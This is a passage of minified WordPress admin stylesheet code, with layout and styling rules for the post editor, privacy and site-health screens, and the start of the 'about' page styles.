div#minor-publishing{display:none}.is-dragging-metaboxes .metabox-holder .postbox-container .meta-box-sortables{border-radius:8px;background:rgb(var(--wp-admin-theme-color--rgb),.04);min-height:60px;margin-bottom:20px}.postbox{position:relative;min-width:255px;border:1px solid #c3c4c7;box-shadow:0 1px 1px rgba(0,0,0,.04);background:#fff}#trackback_url{width:99%}#normal-sortables .postbox .submit{background:transparent none;border:0 none;float:right;padding:0 12px;margin:0}.category-add input[type=text],.category-add select{width:100%;max-width:260px;vertical-align:baseline}#side-sortables .category-add input[type=text],#side-sortables .category-add select{margin:0 0 1em}#side-sortables .add-menu-item-tabs li,.wp-tab-bar li,ul.category-tabs li{display:inline;line-height:1.35}.no-js .category-tabs li.hide-if-no-js{display:none}#side-sortables .add-menu-item-tabs a,.category-tabs a,.wp-tab-bar a{text-decoration:none}#post-body ul.add-menu-item-tabs li.tabs a,#post-body ul.category-tabs li.tabs a,#side-sortables .add-menu-item-tabs .tabs a,#side-sortables .category-tabs .tabs a,.wp-tab-bar .wp-tab-active a{color:#2c3338}.category-tabs{margin:8px 0 5px}#category-adder h4{margin:0}.taxonomy-add-new{display:inline-block;margin:10px 0;font-weight:600}#side-sortables .add-menu-item-tabs,.wp-tab-bar{margin-bottom:3px}#normal-sortables .postbox #replyrow .submit{float:none;margin:0;padding:5px 7px 10px;overflow:hidden}#side-sortables .submitbox .submit .preview,#side-sortables .submitbox .submit a.preview:hover,#side-sortables .submitbox .submit input{border:0 none}ul.add-menu-item-tabs,ul.category-tabs,ul.wp-tab-bar{margin-top:12px}ul.add-menu-item-tabs li,ul.category-tabs li{border:solid 1px transparent;position:relative}.wp-tab-active,ul.add-menu-item-tabs li.tabs,ul.category-tabs li.tabs{border:1px solid #dcdcde;border-bottom-color:#fff;background-color:#fff}ul.add-menu-item-tabs li,ul.category-tabs li,ul.wp-tab-bar li{padding:3px 5px 6px}#set-post-thumbnail{display:inline-block;max-width:100%}#postimagediv .inside img{max-width:100%;height:auto;vertical-align:top;background-image:linear-gradient(45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7),linear-gradient(45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7);background-position:0 0,10px 10px;background-size:20px 20px}form#tags-filter{position:relative}.ui-tabs-hide,.wp-hidden-children .wp-hidden-child{display:none}#post-body .tagsdiv #newtag{margin-right:0;flex:1;min-width:0}#side-sortables input#post_password{width:94%}#side-sortables .tagsdiv #newtag{flex:1;min-width:0}#post-status-info{width:100%;border-spacing:0;border:1px solid #c3c4c7;border-top:none;background-color:#f6f7f7;box-shadow:0 1px 1px rgba(0,0,0,.04);z-index:999}#post-status-info td{font-size:12px}.autosave-info{padding:2px 10px;text-align:right}#editorcontent #post-status-info{border:none}#content-resize-handle{background:transparent url(../images/resize.gif) no-repeat scroll right bottom;width:12px;cursor:row-resize}.rtl #content-resize-handle{background-image:url(../images/resize-rtl.gif);background-position:left bottom}.wp-editor-expand #content-resize-handle{display:none}#postdivrich #content{resize:none}#wp-word-count{padding:2px 10px}#wp-content-editor-container{position:relative}.wp-editor-expand #wp-content-editor-tools{z-index:1000;border-bottom:1px solid #c3c4c7}.wp-editor-expand #wp-content-editor-container{box-shadow:none;margin-top:-1px}.wp-editor-expand #wp-content-editor-container{border-bottom:0 none}.wp-editor-expand div.mce-statusbar{z-index:1}.wp-editor-expand #post-status-info{border-top:1px solid #c3c4c7}.wp-editor-expand div.mce-toolbar-grp{z-index:999}.mce-fullscreen #wp-content-wrap .mce-edit-area,.mce-fullscreen #wp-content-wrap .mce-menubar,.mce-fullscreen #wp-content-wrap .mce-statusbar,.mce-fullscreen #wp-content-wrap .mce-toolbar-grp{position:static!important;width:auto!important;padding:0!important}.mce-fullscreen #wp-content-wrap .mce-statusbar{visibility:visible!important}.mce-fullscreen #wp-content-wrap .mce-tinymce .mce-wp-dfw{display:none}.mce-fullscreen #wp-content-wrap .mce-wp-dfw,.post-php.mce-fullscreen #wpadminbar{display:none}#wp-content-editor-tools{background-color:#f0f0f1;padding-top:20px}#poststuff #post-body.columns-2 #side-sortables{width:280px}#timestampdiv select{vertical-align:top;font-size:12px;line-height:2.33333333}#aa,#hh,#jj,#mn{padding:6px 1px;font-size:12px;line-height:1.16666666}#hh,#jj,#mn{width:2em}#aa{width:3.4em}.curtime #timestamp{padding:2px 0 1px;display:inline!important;height:auto!important}#post-body #visibility:before,#post-body .misc-pub-comment-status:before,#post-body .misc-pub-post-status:before,#post-body .misc-pub-response-to:before,#post-body .misc-pub-revisions:before,#post-body .misc-pub-uploadedby:before,#post-body .misc-pub-uploadedto:before,.curtime #timestamp:before{color:#8c8f94}#post-body #visibility:before,#post-body .misc-pub-comment-status:before,#post-body .misc-pub-post-status:before,#post-body .misc-pub-response-to:before,#post-body .misc-pub-revisions:before,#post-body .misc-pub-uploadedby:before,#post-body .misc-pub-uploadedto:before,.curtime #timestamp:before{font:normal 20px/1 dashicons;display:inline-block;margin-left:-1px;padding-right:3px;vertical-align:top;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}#post-body .misc-pub-comment-status:before,#post-body .misc-pub-post-status:before{content:"\f173";content:"\f173"/''}#post-body #visibility:before{content:"\f177";content:"\f177"/''}.curtime #timestamp:before{content:"\f145";content:"\f145"/'';position:relative;top:-1px}#post-body .misc-pub-uploadedby:before{content:"\f110";content:"\f110"/'';position:relative;top:-1px}#post-body .misc-pub-uploadedto:before{content:"\f318";content:"\f318"/'';position:relative;top:-1px}#post-body .misc-pub-revisions:before{content:"\f321";content:"\f321"/''}#post-body .misc-pub-response-to:before{content:"\f101";content:"\f101"/''}#timestampdiv{padding-top:5px;line-height:1.76923076}#timestampdiv p{margin:8px 0 6px}#timestampdiv input{text-align:center}.notification-dialog{position:fixed;top:30%;max-height:70%;left:50%;width:450px;margin-left:-225px;background:#fff;box-shadow:0 3px 6px rgba(0,0,0,.3);line-height:1.5;z-index:1000005;overflow-y:auto}.notification-dialog-background{position:fixed;top:0;left:0;right:0;bottom:0;background:#000;opacity:.7;z-index:1000000}#post-lock-dialog .post-locked-message,#post-lock-dialog .post-taken-over{margin:25px}#file-editor-warning .button,#post-lock-dialog .post-locked-message a.button{margin-right:10px}#post-lock-dialog .post-locked-avatar{float:left;margin:0 20px 20px 0}#post-lock-dialog .wp-tab-first{outline:0}#post-lock-dialog .locked-saving img{float:left;margin-right:3px}#post-lock-dialog.saved .locked-saved,#post-lock-dialog.saving .locked-saving{display:inline}#excerpt{display:block;margin:12px 0 0;height:4em;width:100%}.tagchecklist{margin-left:14px;font-size:12px;overflow:auto}.tagchecklist br{display:none}.tagchecklist strong{margin-left:-8px;position:absolute}.tagchecklist>li{float:left;margin-right:25px;font-size:13px;line-height:1.8;cursor:default;max-width:100%;overflow:hidden;text-overflow:ellipsis}.tagchecklist .ntdelbutton{position:absolute;width:24px;height:24px;border:none;margin:0 0 0 -19px;padding:0;background:0 0;cursor:pointer;text-indent:0}#poststuff .stuffbox>h3,#poststuff h2,#poststuff h3.hndle{font-size:14px;padding:8px 12px;margin:0;line-height:1.4}#poststuff .stuffbox h2{padding:8px 10px}#poststuff .stuffbox>h2{border-bottom:1px solid #f0f0f1}#poststuff .inside{margin:6px 0 0}.link-add-php #poststuff .inside,.link-php #poststuff .inside{margin-top:12px}#poststuff .stuffbox .inside{margin:0}#poststuff .inside #page_template,#poststuff .inside #parent_id{max-width:100%}.post-attributes-label-wrapper{margin-bottom:.5em}.post-attributes-label{vertical-align:baseline;font-weight:600}#comment-status-radio,#post-visibility-select{line-height:1.5;margin-top:3px}#linksubmitdiv .inside,#poststuff #submitdiv .inside{margin:0;padding:0}#post-body-content,.edit-form-section{margin-bottom:20px}.wp_attachment_details .attachment-content-description{margin-top:.5385em;display:inline-block;min-height:1.6923em}.privacy-settings #wpcontent,.privacy-settings.auto-fold #wpcontent,.site-health #wpcontent,.site-health.auto-fold #wpcontent{padding-left:0}.privacy-settings .notice,.site-health .notice{margin:25px 20px 15px 22px}.privacy-settings .notice~.notice,.site-health .notice~.notice{margin-top:5px}.health-check-header h1,.privacy-settings-header h1{display:inline-block;font-weight:600;margin:0 .8rem 1rem;font-size:23px;padding:9px 0 4px;line-height:1.3}.health-check-header,.privacy-settings-header{text-align:center;margin:0 0 1rem;background:#fff;border-bottom:1px solid #dcdcde}.health-check-title-section,.privacy-settings-title-section{display:flex;align-items:center;justify-content:center;clear:both;padding-top:8px}.privacy-settings-tabs-wrapper{display:-ms-inline-grid;-ms-grid-columns:1fr 1fr;vertical-align:top;display:inline-grid;grid-template-columns:1fr 1fr}.privacy-settings-tab{display:block;text-decoration:none;color:inherit;padding:.5rem 1rem 1rem;margin:0 1rem;transition:box-shadow .5s ease-in-out}.health-check-tab:first-child,.privacy-settings-tab:first-child{-ms-grid-column:1}.health-check-tab:nth-child(2),.privacy-settings-tab:nth-child(2){-ms-grid-column:2}.health-check-tab:focus,.privacy-settings-tab:focus{color:#1d2327;outline:1px solid #787c82;box-shadow:none}.health-check-tab.active,.privacy-settings-tab.active{box-shadow:inset 0 -3px var(--wp-admin-theme-color);font-weight:600}.health-check-body,.privacy-settings-body{max-width:800px;margin:0 auto}.tools-privacy-policy-page th{min-width:230px}.hr-separator{margin-top:20px;margin-bottom:15px}.health-check-accordion,.privacy-settings-accordion{border:1px solid #c3c4c7}.health-check-accordion-heading,.privacy-settings-accordion-heading{margin:0;border-top:1px solid #c3c4c7;font-size:inherit;line-height:inherit;font-weight:600;color:inherit}.health-check-accordion-heading:first-child,.privacy-settings-accordion-heading:first-child{border-top:none}.health-check-accordion-trigger,.privacy-settings-accordion-trigger{background:#fff;border:0;color:#2c3338;cursor:pointer;display:flex;font-weight:400;margin:0;padding:1em 3.5em 1em 1.5em;min-height:46px;position:relative;text-align:left;width:100%;align-items:center;justify-content:space-between;-webkit-user-select:auto;user-select:auto}.health-check-accordion-trigger:active,.health-check-accordion-trigger:hover,.privacy-settings-accordion-trigger:active,.privacy-settings-accordion-trigger:hover{background:#f6f7f7}.health-check-accordion-trigger:focus,.privacy-settings-accordion-trigger:focus{color:#1d2327;border:none;box-shadow:none;outline-offset:-1px;outline:2px solid var(--wp-admin-theme-color);background-color:#f6f7f7}.health-check-accordion-trigger .title,.privacy-settings-accordion-trigger .title{pointer-events:none;font-weight:600;flex-grow:1}.health-check-accordion-trigger .icon,.privacy-settings-accordion-trigger .icon,.privacy-settings-view-read .icon,.site-health-view-passed .icon{border:solid #50575e;border-width:0 2px 2px 0;height:.5rem;pointer-events:none;position:absolute;right:1.5em;top:50%;transform:translateY(-70%) rotate(45deg);width:.5rem}.health-check-accordion-trigger .badge,.privacy-settings-accordion-trigger .badge{padding:.1rem .5rem .15rem;color:#2c3338;font-weight:600}.privacy-settings-accordion-trigger .badge{margin-left:.5rem}.health-check-accordion-trigger .badge.blue,.privacy-settings-accordion-trigger .badge.blue{border:1px solid var(--wp-admin-theme-color)}.health-check-accordion-trigger .badge.orange,.privacy-settings-accordion-trigger .badge.orange{border:1px solid #dba617}.health-check-accordion-trigger .badge.red,.privacy-settings-accordion-trigger .badge.red{border:1px solid #e65054}.health-check-accordion-trigger .badge.green,.privacy-settings-accordion-trigger .badge.green{border:1px solid #00ba37}.health-check-accordion-trigger .badge.purple,.privacy-settings-accordion-trigger .badge.purple{border:1px solid #2271b1}.health-check-accordion-trigger .badge.gray,.privacy-settings-accordion-trigger .badge.gray{border:1px solid #c3c4c7}.health-check-accordion-trigger[aria-expanded=true] .icon,.privacy-settings-accordion-trigger[aria-expanded=true] .icon,.privacy-settings-view-passed[aria-expanded=true] .icon,.site-health-view-passed[aria-expanded=true] .icon{transform:translateY(-30%) rotate(-135deg)}.health-check-accordion-panel,.privacy-settings-accordion-panel{margin:0;padding:1em 1.5em;background:#fff}.health-check-accordion-panel[hidden],.privacy-settings-accordion-panel[hidden]{display:none}.health-check-accordion-panel a .dashicons,.privacy-settings-accordion-panel a .dashicons{text-decoration:none}.privacy-settings-accordion-actions{justify-content:right;display:flex;align-items:center;flex-wrap:wrap;gap:1em}.privacy-settings-accordion-actions .success{display:none;color:#007017}.privacy-settings-accordion-actions .success.visible{display:inline-block}.privacy-settings-accordion-panel.hide-privacy-policy-tutorial .privacy-policy-tutorial,.privacy-settings-accordion-panel.hide-privacy-policy-tutorial .privacy-text-copy,.privacy-settings-accordion-panel.hide-privacy-policy-tutorial .wp-policy-help{display:none}.privacy-settings-accordion-panel strong.privacy-policy-tutorial,.privacy-settings-accordion-panel strong.wp-policy-help{display:block;margin:0 0 1em}.privacy-text-copy span{pointer-events:none}.privacy-settings-accordion-panel .wp-suggested-text div>:not(h1):not(h2):not(h3):not(h4):not(h5):not(h6):not(div):not(.privacy-policy-tutorial):not(.wp-policy-help):not(.privacy-text-copy):not(span.success):not(.notice p),.privacy-settings-accordion-panel .wp-suggested-text>:not(h1):not(h2):not(h3):not(h4):not(h5):not(h6):not(div):not(.privacy-policy-tutorial):not(.wp-policy-help):not(.privacy-text-copy):not(span.success):not(.notice p),.privacy-settings-accordion-panel div>:not(h1):not(h2):not(h3):not(h4):not(h5):not(h6):not(div):not(.privacy-policy-tutorial):not(.wp-policy-help):not(.privacy-text-copy):not(span.success):not(.notice p),.privacy-settings-accordion-panel>:not(h1):not(h2):not(h3):not(h4):not(h5):not(h6):not(div):not(.privacy-policy-tutorial):not(.wp-policy-help):not(.privacy-text-copy):not(span.success):not(.notice p){margin:0;padding:1em;border-left:2px solid #787c82}@media screen and (max-width:782px){.health-check-body,.privacy-settings-body{margin:0 12px;width:auto}.privacy-settings .notice,.site-health .notice{margin:5px 10px 15px}.privacy-settings .update-nag,.site-health .update-nag{margin-right:10px;margin-left:10px}input#create-page{margin-top:10px}.wp-core-ui button.privacy-text-copy{white-space:normal;line-height:1.8}#edit-slug-box{padding:0}#editable-post-name input{min-height:40px}}@media only screen and (max-width:1004px){.health-check-body,.privacy-settings-body{margin:0 22px;width:auto}}#postcustomstuff thead th{padding:5px 8px 8px;background-color:#f0f0f1}#postcustom #postcustomstuff .submit{border:0 none;float:none;padding:0 8px 8px}#postcustom #postcustomstuff .add-custom-field{padding:12px 8px 8px}#side-sortables #postcustom #postcustomstuff .submit{margin:0;padding:0}#side-sortables #postcustom #postcustomstuff #the-list textarea{height:85px}#side-sortables #postcustom #postcustomstuff td.left input,#side-sortables #postcustom #postcustomstuff td.left select,#side-sortables #postcustomstuff #newmetaleft a{margin:3px 3px 0}#postcustomstuff table{margin:0;width:100%;border:1px solid #dcdcde;border-spacing:0;background-color:#f6f7f7}#postcustomstuff tr{vertical-align:top}#postcustomstuff table input,#postcustomstuff table select,#postcustomstuff table textarea{width:96%;margin:8px}#side-sortables #postcustomstuff table input,#side-sortables #postcustomstuff table select,#side-sortables #postcustomstuff table textarea{margin:3px}#postcustomstuff td.left,#postcustomstuff th.left{width:38%}#postcustomstuff .submit input{margin:0;width:auto}#postcustomstuff #newmeta-button,#postcustomstuff #newmetaleft a{display:inline-block;margin:0 8px 8px;text-decoration:none}.no-js #postcustomstuff #enternew{display:none}#post-body-content .compat-attachment-fields{margin-bottom:20px}.compat-attachment-fields th{padding-top:5px;padding-right:10px}#select-featured-image{padding:4px 0;overflow:hidden}#select-featured-image img{max-width:100%;height:auto;margin-bottom:10px}#select-featured-image a{float:left;clear:both}#select-featured-image .remove{display:none;margin-top:10px}.js #select-featured-image.has-featured-image .remove{display:inline-block}.no-js #select-featured-image .choose{display:none}.post-format-icon::before{display:inline-block;vertical-align:middle;height:20px;width:20px;margin-top:-4px;margin-right:7px;color:#dcdcde;font:normal 20px/1 dashicons;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}a.post-format-icon:hover:before{color:#135e96}#post-formats-select{line-height:2}#post-formats-select .post-format-icon::before{top:5px}input.post-format{margin-top:1px}label.post-format-icon{margin-left:0;padding:2px 0}.post-format-icon.post-format-standard::before{content:"\f109";content:"\f109"/''}.post-format-icon.post-format-image::before{content:"\f128";content:"\f128"/''}.post-format-icon.post-format-gallery::before{content:"\f161";content:"\f161"/''}.post-format-icon.post-format-audio::before{content:"\f127";content:"\f127"/''}.post-format-icon.post-format-video::before{content:"\f126";content:"\f126"/''}.post-format-icon.post-format-chat::before{content:"\f125";content:"\f125"/''}.post-format-icon.post-format-status::before{content:"\f130";content:"\f130"/''}.post-format-icon.post-format-aside::before{content:"\f123";content:"\f123"/''}.post-format-icon.post-format-quote::before{content:"\f122";content:"\f122"/''}.post-format-icon.post-format-link::before{content:"\f103";content:"\f103"/''}.category-adder{margin-left:120px;padding:4px 0}.category-adder h4{margin:0 0 8px}#side-sortables .category-adder{margin:0}.categorydiv div.tabs-panel,.customlinkdiv div.tabs-panel,.posttypediv div.tabs-panel,.taxonomydiv div.tabs-panel,.wp-tab-panel{min-height:42px;max-height:200px;overflow:auto;padding:0 .9em;border:solid 1px #dcdcde;background-color:#fff}div.tabs-panel-active{display:block}div.tabs-panel-inactive{display:none}div.tabs-panel-active:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}#front-page-warning,#front-static-pages ul,.categorydiv ul.categorychecklist ul,.customlinkdiv ul.categorychecklist ul,.inline-editor ul.cat-checklist ul,.options-discussion-php .indent-children ul,.posttypediv ul.categorychecklist ul,.taxonomydiv ul.categorychecklist ul,ul.export-filters{margin-left:18px}ul.categorychecklist li{margin:0;padding:0;line-height:1.69230769;word-wrap:break-word}.categorydiv .tabs-panel,.customlinkdiv .tabs-panel,.posttypediv .tabs-panel,.taxonomydiv .tabs-panel{border-width:3px;border-style:solid}.form-wrap label{display:block;padding:2px 0}.form-field input[type=email],.form-field input[type=number],.form-field input[type=password],.form-field input[type=search],.form-field input[type=tel],.form-field input[type=text],.form-field input[type=url],.form-field textarea{border-style:solid;border-width:1px;width:95%}.form-field p,.form-field select{max-width:95%}.form-wrap p,p.description{margin:2px 0 5px;color:#646970}.form-wrap p,p.description,p.help,span.description{font-size:13px}p.description code{font-style:normal}.form-wrap p code,p.description code{color:#50575e}.form-wrap .form-field{margin:1em 0;padding:0}.col-wrap h2{margin:12px 0;font-size:1.1em}.col-wrap p.submit{margin-top:-10px}.edit-term-notes{margin-top:2em}#poststuff .tagsdiv .ajaxtag{margin-top:1em;display:flex;gap:8px;align-items:center}#poststuff .tagsdiv .howto{margin:1em 0 6px}.ajaxtag .newtag{position:relative}.tagsdiv .newtag{flex:1;min-width:0}.tagsdiv .the-tags{display:block;height:60px;margin:0 auto;overflow:auto;width:260px}#post-body-content .tagsdiv .the-tags{margin:0 5px}p.popular-tags{border:none;line-height:2em;padding:8px 12px 12px;text-align:justify}p.popular-tags a{padding:0 3px}.tagcloud{width:97%;margin:0 0 40px;text-align:justify}.tagcloud h2{margin:2px 0 12px}#poststuff .inside .the-tagcloud{margin:5px 0 10px;padding:8px;border:1px solid #dcdcde;line-height:1.2;word-spacing:3px}.the-tagcloud ul{margin:0}.the-tagcloud ul li{display:inline-block}.ac_results{display:none;margin:-1px 0 0;padding:0;list-style:none;position:absolute;z-index:10000;border:1px solid #4f94d4;background-color:#fff}.wp-customizer .ac_results{z-index:500000}.ac_results li{margin:0;padding:5px 10px;white-space:nowrap;text-align:left}.ac_over .ac_match,.ac_results .ac_over{background-color:#2271b1;color:#fff;cursor:pointer}.ac_match{text-decoration:underline}#addtag .spinner{float:none;vertical-align:top}#edittag{max-width:800px}.edit-tag-actions{display:flex;align-items:center;gap:8px;margin-top:20px}.comment-php .wp-editor-area{height:200px}.comment-ays td,.comment-ays th{padding:10px 15px}.comment-ays .comment-content ul{list-style:initial;margin-left:2em}.comment-ays .comment-content a[href]:after{content:"(" attr(href) ")";display:inline-block;padding:0 4px;color:#646970;font-size:13px;word-break:break-all}.comment-ays .comment-content p.edit-comment{margin-top:10px}.comment-ays .comment-content p.edit-comment a[href]:after{content:"";padding:0}.comment-ays-submit .button-cancel{margin-left:1em}.spam-undo-inside,.trash-undo-inside{margin:1px 8px 1px 0;line-height:1.23076923}.spam-undo-inside .avatar,.trash-undo-inside .avatar{height:20px;width:20px;margin-right:8px;vertical-align:middle}.stuffbox .editcomment{clear:none;margin-top:0}#namediv.stuffbox .editcomment input{width:100%}#namediv.stuffbox .editcomment.form-table td{padding:10px}#comment-status-radio p{margin:3px 0 5px}#comment-status-radio input{margin:2px 3px 5px 0;vertical-align:middle}#comment-status-radio label{padding:5px 0}table.links-table{width:100%;border-spacing:0}.links-table th{font-weight:400;text-align:left;vertical-align:top;min-width:80px;width:20%;word-wrap:break-word}.links-table td,.links-table th{padding:5px 0}.links-table td label{margin-right:8px}.links-table td input[type=text],.links-table td textarea{width:100%}.links-table #link_rel{max-width:280px}#qt_content_dfw{display:none}.wp-editor-expand #qt_content_dfw{display:inline-block}.focus-on #screen-meta,.focus-on #screen-meta-links,.focus-on #wp-toolbar,.focus-on #wpfooter,.focus-on .page-title-action,.focus-on .postbox-container>*,.focus-on .update-nag,.focus-on .wrap>h1,.focus-on div.error,.focus-on div.notice,.focus-on div.updated{opacity:0;transition-duration:.6s;transition-property:opacity;transition-timing-function:ease-in-out}.focus-on #wp-toolbar{opacity:.3}.focus-off #screen-meta,.focus-off #screen-meta-links,.focus-off #wp-toolbar,.focus-off #wpfooter,.focus-off .page-title-action,.focus-off .postbox-container>*,.focus-off .update-nag,.focus-off .wrap>h1,.focus-off div.error,.focus-off div.notice,.focus-off div.updated{opacity:1;transition-duration:.2s;transition-property:opacity;transition-timing-function:ease-in-out}.focus-off #wp-toolbar{-webkit-transform:translate(0,0)}.focus-on #adminmenuback,.focus-on #adminmenuwrap{transition-duration:.6s;transition-property:transform;transition-timing-function:ease-in-out}.focus-on #adminmenuback,.focus-on #adminmenuwrap{transform:translateX(-100%)}.focus-off #adminmenuback,.focus-off #adminmenuwrap{transform:translateX(0);transition-duration:.2s;transition-property:transform;transition-timing-function:ease-in-out}@media print,(min-resolution:120dpi){#content-resize-handle,#post-body .wp_themeSkin .mceStatusbar a.mceResize{background:transparent url(../images/resize-2x.gif) no-repeat scroll right bottom;background-size:11px 11px}.rtl #content-resize-handle,.rtl #post-body .wp_themeSkin .mceStatusbar a.mceResize{background-image:url(../images/resize-rtl-2x.gif);background-position:left bottom}}@media only screen and (max-width:1200px){.post-type-attachment #poststuff{min-width:0}.post-type-attachment #wpbody-content #poststuff #post-body{margin:0}.post-type-attachment #wpbody-content #post-body.columns-2 #postbox-container-1{margin-right:0;width:100%}.post-type-attachment #poststuff #postbox-container-1 #side-sortables:empty,.post-type-attachment #poststuff #postbox-container-1 .empty-container{outline:0;height:0;min-height:0}.post-type-attachment #poststuff #post-body.columns-2 #side-sortables{min-height:0;width:auto}.is-dragging-metaboxes.post-type-attachment #post-body .meta-box-sortables{border:none;background:0 0;min-height:0;margin-bottom:0}.post-type-attachment .columns-prefs,.post-type-attachment .screen-layout{display:none}}@media only screen and (max-width:850px){#poststuff{min-width:0}#wpbody-content #poststuff #post-body{margin:0}#wpbody-content #post-body.columns-2 #postbox-container-1{margin-right:0;width:100%}#poststuff #postbox-container-1 #side-sortables:empty,#poststuff #postbox-container-1 .empty-container{height:0;min-height:0}#poststuff #post-body.columns-2 #side-sortables{min-height:0;width:auto}.is-dragging-metaboxes #poststuff #post-body.columns-2 #side-sortables,.is-dragging-metaboxes #poststuff #post-body.columns-2 .meta-box-sortables,.is-dragging-metaboxes #poststuff #postbox-container-1 #side-sortables:empty,.is-dragging-metaboxes #poststuff #postbox-container-1 .empty-container{height:auto;min-height:60px}.columns-prefs,.screen-layout{display:none}}@media screen and (max-width:782px){.wp-core-ui .edit-tag-actions .button-primary{margin-bottom:0}#post-body-content{min-width:0}#titlediv #title-prompt-text{padding:10px}#poststuff .stuffbox .inside{padding:0 2px 4px 0}#poststuff .stuffbox>h3,#poststuff h2,#poststuff h3.hndle{padding:12px}#namediv.stuffbox .editcomment.form-table td{padding:5px 10px}.post-format-options{padding-right:0}.post-format-options a{margin-right:5px;margin-bottom:5px;min-width:52px}.post-format-options .post-format-title{font-size:11px}.post-format-options a div{height:28px;width:28px}.post-format-options a div:before{font-size:26px!important}#post-visibility-select{line-height:280%}.wp-core-ui .save-post-visibility,.wp-core-ui .save-timestamp{vertical-align:middle;margin-right:15px}.timestamp-wrap select#mm{display:block;width:100%;margin-bottom:10px}.timestamp-wrap #aa,.timestamp-wrap #hh,.timestamp-wrap #jj,.timestamp-wrap #mn{padding:12px 3px;font-size:14px;margin-bottom:5px;width:auto;text-align:center}ul.category-tabs{margin:30px 0 15px}ul.category-tabs li.tabs{padding:15px}ul.categorychecklist li{margin-bottom:15px}ul.categorychecklist ul{margin-top:15px}.category-add input[type=text],.category-add select{max-width:none;margin-bottom:15px}.tagsdiv .newtag{flex:1;min-width:0;height:auto;margin-bottom:0}.tagchecklist{margin:25px 10px}.tagchecklist>li{font-size:16px;line-height:1.4}#commentstatusdiv p{line-height:2.8}.mceToolbar *{white-space:normal!important}.mceToolbar td,.mceToolbar tr{float:left!important}.wp_themeSkin a.mceButton{width:30px;height:30px}.wp_themeSkin .mceButton .mceIcon{margin-top:5px;margin-left:5px}.wp_themeSkin .mceSplitButton{margin-top:1px}.wp_themeSkin .mceSplitButton td a.mceAction{padding:6px 3px 6px 6px}.wp_themeSkin .mceSplitButton td a.mceOpen,.wp_themeSkin .mceSplitButtonEnabled:hover td a.mceOpen{padding-top:6px;padding-bottom:6px;background-position:1px 6px}.wp_themeSkin table.mceListBox{margin:5px}div.quicktags-toolbar input{padding:10px 20px}button.wp-switch-editor{font-size:16px;line-height:1;margin:7px 0 0 7px;padding:8px 12px}#wp-content-media-buttons a{font-size:14px;padding:6px 10px}.wp-media-buttons span.jetpack-contact-form-icon,.wp-media-buttons span.wp-media-buttons-icon{width:22px!important;margin-left:-2px!important}.wp-media-buttons #insert-jetpack-contact-form span.jetpack-contact-form-icon:before,.wp-media-buttons .add_media span.wp-media-buttons-icon:before{font-size:20px!important}#content_wp_fullscreen{display:none}.misc-pub-section{padding:12px 10px}#delete-action,#publishing-action{line-height:3.61538461}#publishing-action .spinner{float:none;margin-top:-2px}.comment-ays td,.comment-ays th{padding-bottom:0}.comment-ays td{padding-top:6px}.links-table #link_rel{max-width:none}.links-table td,.links-table th{padding:10px 0}.edit-term-notes{display:none}.privacy-text-box{width:auto}.privacy-text-box-toc{float:none;width:auto;height:100%;display:flex;flex-direction:column}.privacy-text-section .return-to-top{margin:2em 0 0}}/*! This file is auto-generated */ .about__container{--background:#ebe8e5;--subtle-background:#ebe8e5;--text:#1e1e1e;--text-light:#fff;--accent-1:#3858e9;--accent-2:#183ad6;--accent-3:#ececec;--accent-gradient:linear-gradient(-90deg, #000000 4.7%, var(--accent-1) 83.84%);--nav-background:#fff;--nav-border:transparent;--nav-color:var(--text);--nav-current:var(--accent-1);--border-radius:0.5rem;--gap:2rem}.about-php,.contribute-php,.credits-php,.freedoms-php,.privacy-php{background:#fff}.about-php #wpcontent,.contribute-php #wpcontent,.credits-php #wpcontent,.freedoms-php #wpcontent,.privacy-php #wpcontent{background:#fff;padding:0 24px}@media screen and (max-width:782px){.about-php.auto-fold #wpcontent,.contribute-php.auto-fold #wpcontent,.credits-php.auto-fold #wpcontent,.freedoms-php.auto-fold #wpcontent,.privacy-php.auto-fold #wpcontent{padding-right:24px}}.about__container{max-width:1000px;margin:24px auto;clear:both}.about__container .alignleft{float:right}.about__container .alignright{float:left}.about__container .aligncenter{text-align:center}.about__container .is-vertically-aligned-top{align-self:start}.about__container .is-vertically-aligned-center{align-self:center}.about__container .is-vertically-aligned-bottom{align-self:end}.about__section{background:0 0;clear:both}.about__container .has-accent-background-color{color:var(--text-light);background-color:var(--accent-2)}.about__container .has-transparent-background-color{background-color:transparent}.about__container .has-accent-color{color:var(--accent-2)}.about__container .has-border{border:3px solid currentColor}.about__container .has-subtle-background-color{background-color:var(--subtle-background);border-radius:var(--border-radius)}.about__container .has-background-image{background-size:contain;background-repeat:no-repeat;background-position:center}.about__section{margin:0}.about__section .column:not(.is-edge-to-edge){padding:var(--gap)}.about__section .column.is-left-padding-zero{padding-right:0}.about__section .column.is-right-padding-zero{padding-left:0}.about__section+.about__section .is-section-header{padding-bottom:var(--gap)}.about__section .column.has-border:not(.is-edge-to-edge),.about__section .column[class*=background-color]:not(.is-edge-to-edge),.about__section:where([class*=background-color]) .column:not(.is-edge-to-edge){padding-top:var(--gap);padding-bottom:var(--gap)}.about__section .column p:first-of-type{margin-top:0}.about__section .column p:last-of-type{margin-bottom:0}.about__section .has-text-columns{columns:2;column-gap:calc(var(--gap) * 2)}.about__section .is-section-header{margin-bottom:0;padding:var(--gap) var(--gap) 0}.about__section .is-section-header p:last-child{margin-bottom:0}.about__section .is-section-header:first-child:last-child{padding:0}.about__section.is-feature{padding:var(--gap)}.about__section.is-feature p{margin:0}.about__section.is-feature p+p{margin-top:calc(var(--gap)/ 2)}.about__section.has-1-column{margin-right:auto;margin-left:auto;max-width:36em}.about__section.has-2-columns,.about__section.has-3-columns,.about__section.has-4-columns,.about__section.has-overlap-style{display:grid}.about__section.has-gutters{gap:var(--gap);margin-bottom:var(--gap)}.about__section.has-2-columns{grid-template-columns:1fr 1fr}.about__section.has-2-columns.is-wider-right{grid-template-columns:2fr 3fr}.about__section.has-2-columns.is-wider-left{grid-template-columns:3fr 2fr}.about__section .is-section-header{grid-column-start:1;grid-column-end:-1}.about__section.has-3-columns{grid-template-columns:repeat(3,1fr)}.about__section.has-4-columns{grid-template-columns:repeat(4,1fr)}.about__section.has-overlap-style{grid-template-columns:repeat(7,1fr)}.about__section.has-overlap-style .column{grid-row-start:1}.about__section.has-overlap-style 